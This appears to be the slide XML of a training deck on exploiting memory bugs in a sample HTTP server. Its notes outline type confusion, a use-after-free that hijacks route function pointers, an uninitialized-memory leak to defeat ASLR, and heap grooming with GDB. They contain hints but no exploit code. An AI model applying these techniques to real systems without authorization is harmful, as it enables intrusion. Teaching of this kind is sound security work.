          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3034602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Routes now points to a header!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Zooming in on the ROUTES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3497453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Zooming in on the ROUTES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type confusion – char* name of header is the same as index 0 of the routes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Possible but hard to exploit because we DON’T control ALL of the data here in the allocation.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2854546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Knowing your target – how does it work? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1135108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res_header_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[0x20]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Freeing the route pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UAF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allocate underneath the ‘routes’ pointer to control all routes with function pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Show the proof of concept within Python and GDB!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3425855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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2412440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real world, you’d look for bugs individually or set up a fuzzing harness. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this case, I’m going to PUSH you to the right bug in order to speed things. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2855290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Linux Bluetooth stack vulnerability </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Beginning of the chain – uninitialized memory vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Point is that the MEMORY is not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>being initialized </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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3574617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Do this for all variables necessary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For info leak, the data needs to be sent back as well. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2488163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Compile with the binary with ASAN </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create quick POC for uninitialized memory bug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hexdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> output in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hexdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16000935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 Python script to send this as well </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>GDB is amazing! Please please please use it!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Hint: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Within the header parsing functionality. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Weird edge-case if statement.</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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1778135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Go to source code to explain this…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="302272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Go to source code to explain this…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1243440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Secret data – pointers and things to break ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2788298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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="898647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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="519572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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3291737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Important to KNOW what’s being allocated and freed at certain points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Hard to understand EVERY call... But, there is a solution to this. </a:t>
            </a:r>
          </a:p>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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22057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source code to show examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30619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Limitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2962800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Go to source code to explain this…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3922894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68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2205203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Unsorted/small/large bin chunks CANNOT be next to the top chunk. Makes this a WHOLE LOT HARDER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use GDB! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> It is your friend with bins, chunks and allocations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Hints: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Allocate the LARGE chunk early in order to use it later!</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69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3441500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Breakpoint before and after the allocation for the uninitialized memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need something that will NOT consolidate with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>top_chunk</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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3976273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Breakpoint before and after the allocation for the uninitialized memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need something that will NOT consolidate with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>top_chunk</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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184292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Describe things in the picture </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be a BODY as well</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33115400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 100% careful calculation yet…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allocate big chunks via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>parse_uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Place large sized values into random values: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Path, etc. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2379363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crazy… tried some things until something worked!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Show an example payload of this working…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
